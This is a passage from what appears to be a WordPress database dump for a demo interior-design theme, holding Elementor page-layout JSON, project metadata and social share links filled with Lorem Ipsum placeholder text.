11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(943,40,'_elementor_page_assets','a:0:{}'),(945,42,'_wp_page_template','elementor_header_footer'),(946,42,'ova_met_header_version','global'),(947,42,'ova_met_footer_version','global'),(948,42,'ova_met_main_layout','global'),(949,42,'ova_met_wide_site','global'),(950,42,'_elementor_edit_mode','builder'),(951,42,'_elementor_template_type','wp-page'),(952,42,'_elementor_version','3.6.6'),(953,42,'_elementor_data','[{\"id\":\"578acfb\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4caa43\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"30744ba\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85c5f4d\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8496340\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8123550\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"87e58d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7ffcc0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"130925d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10ce6ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"78581cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0b3fb8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"43c3626\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a69021d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a9e6da9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"0249a61\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ae4a63\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f35ad08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":44,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"c21f4cf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose us?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_description\":\"#D2D2D2\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7913109\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"d2d92ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"70eed1b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"4dc739d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":56,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"df0b47c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a751d1\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1740,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1828fb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1fb0666\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":630,\"sizes\":[]},\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0516878\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e58e31c\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"Our highlighted services\\nfor interior design\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"72318fe\",\"elType\":\"widget\",\"settings\":{\"template\":\"template1\",\"post_per_page\":3},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3dd923\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"b9e79ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cab819a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"eb766f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"b196b12\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(954,42,'_elementor_page_assets','a:0:{}'),(967,629,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(968,629,'ova_project_service','Interior design'),(969,629,'ova_project_architect','Mike hardson'),(970,629,'ova_project_duration','4.5 Months'),(971,629,'ova_project_location','Broklyn, New York'),(972,629,'_elementor_edit_mode','builder'),(973,629,'_elementor_template_type','wp-post'),(974,629,'_elementor_version','3.6.6'),(975,629,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:84:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:91:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:99:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:85:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}}'),(976,629,'_wp_page_template','default'),(977,629,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Luxury room\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo 